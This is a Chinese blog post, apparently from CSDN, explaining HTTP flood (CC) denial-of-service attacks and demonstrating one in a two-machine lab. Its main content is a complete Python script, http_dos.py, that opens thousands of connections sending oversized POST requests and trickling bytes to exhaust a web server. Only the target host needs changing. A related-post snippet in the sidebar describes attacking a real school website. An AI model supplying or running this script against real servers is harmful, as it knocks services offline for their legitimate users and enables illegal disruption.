http泛洪攻击原理与实例

最新推荐文章于 2024-05-26 09:56:38 发布
最新推荐文章于 2024-05-26 09:56:38 发布
阅读量2.7k 收藏 14
点赞数 2
分类专栏: 一无所知的渗透 文章标签: linux 网络 http web
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/wuyou1995/article/details/109094536
版权
本文介绍了HTTP泛洪攻击(CC攻击)的原理,它是一种分布式拒绝服务(DDoS)攻击,通过大量合法HTTP请求耗尽目标服务器资源。攻击者通常使用工具如LoIC和HULK来实施。在示例中,攻击机模拟用户请求导致目标服务器响应缓慢直至崩溃。由于Web服务必须保持开放,目前完全防御CC攻击是困难的。
摘要由CSDN通过智能技术生成

http泛洪攻击原理与实例

0x01 前言

今天来讲讲关于应用层的泛洪攻击-- http 泛洪攻击(也称cc攻击)
不知道有没有人每次在学校官网到报名选修课的时候,都会为网页刷不出来,报名网页失去响应焦头烂额,特别是在报名一些热门选修课(妹子多的课)。cc攻击就是模拟这种现象,并且这种攻击的技术含量是很低的,掌握一个工具或者一些IP代理的知识就可以实施这种攻击,但可以造成极大的危害。

并且这种攻击是无解的,想彻底地防御cc攻击目前是不可能的,因为web服务不可能关闭,他需要不断的接受来自用户的http 请求。
下面在搭建的简易环境,体验一下这种攻击。

0x02 http 攻击原理

http泛洪攻击是一种分布式拒绝服务(DDos)攻击。
攻击者控制某些僵尸主机不停地发大量看似合法的HTTP GET或POST数据包请求web服务器或web应用,web 服务不得不去处理这些http的请求数据,一旦目标服务器已满足请求并且无法响应正常流量,会造成目标服务器资源耗尽,一直到宕机崩溃,那么真正的用户的http请求则无法处理。
在这里插入图片描述

目前常用DDos工具有 LoIC、hulk

0x03 攻击演示

这里环境搭建使用一台机器对目标机进行http泛洪攻击,效果也很客观,真是的场景是很多台机器同时对目标机进行攻击。
目标机: ubuntu 16.04
攻击机: ubuntu 18.04

首先搭建apache2 服务器, 然后在/var/www/html/ 中随便写个界面
在这里插入图片描述

这里我使用网上别人写的一个http泛洪脚本http_dos.py ,当然你也可以使用其他的工具, 使用前配置好脚本里面的PORT、HOST、PAGE 三个参数。
然后执行就好了
在这里插入图片描述

在攻击机上抓个包,你会看到很多的攻击机向目标机发送的http post 请求数据包。
在这里插入图片描述

刷新网页,失去响应。

在这里插入图片描述
http_dos.py

import socket
import time
import threading
#Pressure Test,ddos tool
#---------------------------
MAX_CONN=20000
PORT=80
HOST="192.168.124.128"
PAGE="/login.html"
#---------------------------
#http://192.168.124.128/login.html
buf=("POST %s HTTP/1.1\r\n"
"Host: %s\r\n"
"Content-Length: 10000000\r\n"
"Cookie: dklkt_dos_test\r\n"
"\r\n" % (PAGE,HOST))


socks=[]


def conn_thread():
    global socks
    for i in range(0,MAX_CONN):
        s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
        try:
            s.connect((HOST,PORT))
            s.send(buf)
            print "Send buf OK!,conn=%d\n"%i
            socks.append(s)
        except Exception,ex:
            print "Could not connect to server or send error:%s"%ex
            time.sleep(10)
#end def


def send_thread():
    global socks
    while True:
        for s in socks:
            try:
                s.send("f")
                #print "send OK!"
            except Exception,ex:
                print "Send Exception:%s\n"%ex
                socks.remove(s)
                s.close()
        time.sleep(1)
#end def


conn_th=threading.Thread(target=conn_thread,args=())
send_th=threading.Thread(target=send_thread,args=())


conn_th.start()
send_th.start()

参考:
cc攻击 变种慢速攻击
https://www.jianshu.com/p/dff5a0d537d8
cc攻击
http://www.bingdun.com/cc/1158.htm

Tig3rHu
关注
专栏目录
SYN Flood(泛洪攻击
m0_56302003的博客
11-21 2022
原理利用TCP连接的两个缺陷。服务器在从SYN_RECV状态切换到Establish状态时,有一个最长等待时间SYNTimeout,一般是分钟量级的。对IP完全信任报文传输过程中,对报文的源IP是完全信任的。SYN Flood攻击类别。
泛洪攻击(Flood Attack)
探测???
10-04 2473
执行网络攻击,包括 Ping 泛洪攻击,在绝大多数国家/地区都是非法的,它违反了计算机犯罪法律和条例。执行或尝试执行这样的攻击通常会导致法律后果,包括罚款和监禁。因此,这些信息仅供理论学习和了解,绝不应用于非法活动。“泛洪攻击”(Flood Attack)是一种常见的网络攻击类型,其基本思路是通过极大量的网络请求来消耗目标系统的资源,从而使目标系统过载、响应缓慢或者完全无响应。这种攻击通常用来实现 DoS(拒绝服务)或 DDoS(分布式拒绝服务)攻击
HTTP洪水Gong击网站-演示
蓝星花
04-30 3126
最近学了一个Http Flood Attack攻击方式,(http洪水式攻击),这是一种分布式拒绝服务,也就是DDOS攻击,使用代理伺服务器,向受害伺服务器发送大量貌似合法的请求。HTTP洪水攻击通常使用大规模的僵尸网路。那么我们开始演示一下吧:我拿我高中学校的网站,对不起了,就委屈你一下了,哈哈哈!江西东乡一中http://www.jxdxyz.com/Photo/Index.asp好了,到这里...
Syn_Flood 泛洪攻击
liuarmyliu的博客
02-03 1573
Syn_Flood 泛洪攻击 什么是泛洪攻击 Syn-Flood攻击是当前网络上最为常见的DDoS攻击,也是最为经典的拒绝服务攻击,它利用了TCP协议实现上的一个缺陷,通过向网络服务所在端口发送大量的伪造源地址的攻击报文,就可能造成目标服务器中的半开连接队列被占满,从而阻止其他合法用户进行访问。 在TCP连接的时候需要进行三次握手 那么泛洪攻击就是利用三次握手中最后一次的确认握手来发起攻击 攻击者先伪造地址对服务器发起连接请求,服务器收到请求后会返回确认ack,给真正的地址客户端,真正的地址客户端其实并没
推荐一款强大的Golang HTTP洪水攻击工具:Golang-httpflood
最新发布
gitblog_00021的博客
05-26 382
推荐一款强大的Golang HTTP洪水攻击工具:Golang-httpflood golang-httpfloodGolang httpflood(socket) can down a normal website in 10s with 100 connections项目地址:https://gitcode.com/gh_mirrors/go/golang-httpflood 1、项目介绍 ...
各种泛洪攻击
xqhlsjslcy的博客
06-28 1万+
1.SYN泛洪攻击 原理:在三次握手中,客户端发送数据包时包里的源IP是虚假IP,导致服务器在返回SYN数据包时不知道返回给谁。 工具:低版本windows可以使用HUC SYN工具 在命令行输入syn即可查看命令格式。 2.SYN泛洪DDOS攻击攻击者(服务器)性能一般很好,普通的单台攻击不一定能特别成功。因此攻击者控制肉鸡,在肉鸡上安装木马的服务器端,黑客控制端监听端口,做实验的
HTTP Flood攻击与防御原理
zhoupenghui168的博客
04-07 4351
HTTP Flood攻击与防御原理,以及防御方法
java 泛洪攻击_网络泛洪攻击
weixin_35931756的博客
02-28 487
文章来源:“DNS反向查询洪泛攻击”是什么UDP DNS Query Flood攻击采用的方法是向被攻击的服务器发送大量的域名解析请求,通常请求解析的域名是随机生成或者是网络世界上根本不存在的域名,被攻击的DNS 服务器在接收到域名解析请求的时候首先会在服务器上查找是否有对应的缓存,如果查找不到并且该域名无法直接由服务器解析的时候,DNS 服务器会向其上层DNS服务器递归查询域名信息。域名解析的过...
Kali:SYN简单泛洪攻击(DOS攻击
bin789456的博客
04-23 8358
Kali:SYN简单泛洪攻击原理解析工具原理解析正式攻击思路攻击演示 原理解析 SYN泛洪攻击,利用三次握手的缺陷,让tcp连接始终处于未成功连接的半连接状态。 攻击机仅发出第一次握手,不对返回信息进行确认,服务器由于需要不断处理连接信息,就会占用资源。 一旦攻击机发包速度较快,服务器就会出现崩溃,处于拒绝服务的状态。 工具原理解析 Nmap:扫描存活主机,选择攻击对象。 hping3:构造SYN包并发送的工具,能够指定端口,包头信息,发送速度。 具体手册可以使用-h命令查看,中文手册详解提供以下链接: h
泛洪攻击实现
SuperChenPeng的博客
12-23 1205
网络泛洪(DDos):攻击侵入许多因特网上的系统,将DDos控制软件安装进去,然后这些系统再去感染其它系统,通过这些代理,攻击者将攻击指令发送给DDos控制软件,然后这个系统就去控制下面的代理系统去对某个IP地址发送大量假冒的网络流量,然后受攻击者的网络将被这些假的流量所占据就无法为他们的正常用户提供服务了。使用原始套接字时,应用程序负责构建完整的协议头,这使得它常常被用于构造和发送自定义的IP包,如在ping、traceroute等工具中,它们使用ICMP协议构建消息。最后,我们关闭了套接字。
测试syn-flood等泛洪攻击的小软件
10-26
可以模拟syn flood udp flood等泛洪攻击的一款小软件,360会报警。
MAC泛洪攻击和防御
热门推荐
pygain的博客
07-28 2万+
1. 什么是mac地址泛洪攻击? 交换机中存在着一张记录着MAC地址的表,为了完成数据的快速转发,该表具有自动学习机制;泛洪攻击即是攻击者利用这种学习机制不断发送不同的MAC地址给交换机,充满整个MAC表,此时交换机只能进行数据广播,攻击者凭此获得信息。 1.配置实验环境:两个KALI虚拟机,一个作为发送数据的主机,另一个作为劫持信息的中间人,在本电脑WIN7系统上配置FTPSERVER。
关于 泛洪攻击,你需要知道的一切
mukouping82的博客
05-14 5070
一、攻击原理: SYN攻击属于DOS攻击的一种,它利用TCP协议缺陷,通过发送大量的半连接请求,耗费服务器CPU和内存资源.SYN攻击聊了能影响主机外,还可以危 害路由器,防火墙等网络系统,事实上SYN攻击并不管目标是什么系统,只要这些系统打开TCP服务就可以实施.我们知道,在网络中两台电脑建立TCP连接 时需要进行三次握手过程,客户端首先向服务器发关TCP SYN数据包,接着服务器会向客户端发关相应的SYN ACK数据包,最后客户端会以ACK进行响应.从而建立正常的握手过程.在具体的连接细节中,服务器最
洪水攻击怎么办?
weixin_34318326的博客
11-12 1756
洪水攻击网络攻击里比较常见的一种,一般体现就是机器慢(CPU居高不下),ssh等网络服务登陆缓慢甚至会出现登陆不上的情况,甚至在# netstat-n|awk'/^tcp/{++S[$NF]}END{for(ainS)printa,S[a]}'的命令里,发现SYN_RECV 的数量要远远大于ESTABLISHED的数量(几乎是...
各类泛洪攻击总结
qq_45616828的博客
11-08 777
P76
网络】SYN泛洪攻击原理及防御---未消化完
bandaoyu的note
10-31 4797
DDoS和DoS攻击 拒绝服务攻击时,攻击者想非法占用被攻击者的一些资源,比如如:带宽,CPU,内存等等,使得被攻击者无法响应正常用户的请求。 讲泛洪攻击之前,我们先了解一下DoS攻击和DDoS攻击,这两个攻击大体相同,前者的意思是:拒绝服务攻击;后者的意思是:分布式拒绝服务攻击。不要看这两个攻击前一个比后一个多了一个字母,后一个攻击比前你一个攻击少了"分布式"三个字,其实他们具体的来说还是有所区分的。 DDoS是DoS攻击中的一种方法。下面我们来详细看一下区分: DoS(拒绝服务):不是DOS操作
MAC泛洪***的实施与防御
weixin_34234829的博客
09-26 939
原文发表于2017年第7期《网络安全与信息化》,转发到博客。更多相关资料可参看视频教程“局域网安全实战”,http://edu.51cto.com/course/10348.html   MAC泛洪***是一种针对局域网交换机的***方式,目的在于窃取局域网内用户的通信数据。本文以神州数码CS6200交换机为例,从原理、实施、防御三个方面对MAC泛洪***进行了全面介绍。1.    交换机的MAC...
DoS的SYN泛洪攻击原理及解决方案,学到就是赚到!
藏宝大厦
08-28 4056
一文讲尽ddos syn泛洪攻击方式
03-23 2666
什么是SYN泛洪攻击? SYN泛洪(半开放攻击)是一种拒绝服务(DDoS)攻击,旨在通过消耗所有可用的服务器资源使服务器对合法流量不可用。通过重复发送初始连接请求(SYN)数据包,攻击者可以淹没目标服务器计算机上的所有可用端口,从而导致目标设备缓慢响应合法流量或根本不响应。 SYN Flood攻击如何工作? SYN泛洪攻击通过利用TCP连接的握手过程来工作。在正常情况下,TCP连接展示三个不...
LC滤波器设计详解:原理、方法与实例
本书深入浅出地讲解了LC滤波器的设计与制作原理,涵盖了低通、高通、带通、带阻滤波器以及电容耦合谐振器型窄带滤波器的设计方法,如经典设计的定K型、m推演型、巴特沃思型、切比雪夫型、贝塞尔型、高斯型、逆...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值